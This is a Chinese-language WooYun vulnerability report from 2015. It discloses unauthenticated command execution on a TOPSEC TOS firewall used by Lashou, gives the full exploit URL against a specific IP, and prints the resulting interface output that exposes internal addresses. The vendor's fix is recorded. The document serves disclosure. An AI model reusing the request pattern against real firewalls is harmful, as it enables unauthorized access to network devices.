当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160355

漏洞标题:拉手网某系统命令执行

相关厂商:拉手网

漏洞作者: 路人甲

提交时间:2015-12-11 12:52

修复时间:2015-12-19 15:21

公开时间:2015-12-19 15:21

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-11: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

拉手网某系统命令执行

详细说明:

拉手网的TOPSEC TOS 防火墙设备存在命令执行

https://59.151.89.6:8080/cgi/maincgi.cgi?Url=Command&Action=id&Para=id


命令执行后
通过

https://59.151.89.6:8080/cgi/maincgi.cgi?Url=CommandResult


查看返回结果

漏洞证明:

lashou1111111.jpg


lashou2222222.jpg


看了下内网IP

dummy Link encap:Point-to-Point Protocol
inet addr:1.2.3.4 P-t-P:1.2.3.4 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:65534 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:160915315 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:3167400654 (3020.6 Mb)
eth0 Link encap:Ethernet HWaddr 00:13:32:0A:61:B2
inet addr:192.168.1.254 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:10 Base address:0xbc00 Memory:fe9e0000-fea00000
eth1 Link encap:Ethernet HWaddr 00:13:32:0A:61:B3
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:5 Base address:0xcc00 Memory:feae0000-feb00000
eth10 Link encap:Ethernet HWaddr 00:13:32:06:16:54
inet addr:10.168.22.1 Bcast:10.168.22.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2505880170 errors:0 dropped:0 overruns:0 frame:0
TX packets:4028329592 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:3968265358 (3784.4 Mb) TX bytes:2382826955 (2272.4 Mb)


与之前拉手内外网段一只,外网也是拉手某C段ip,可以断定是拉手的设备。

修复方案:

限制下maincgi.cgi访问权限。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-11 14:05

厂商回复:

非常感谢您的报告,我们会马上处理.谢谢.

最新状态:

2015-12-19:已经修复.谢谢.


漏洞评价:

评论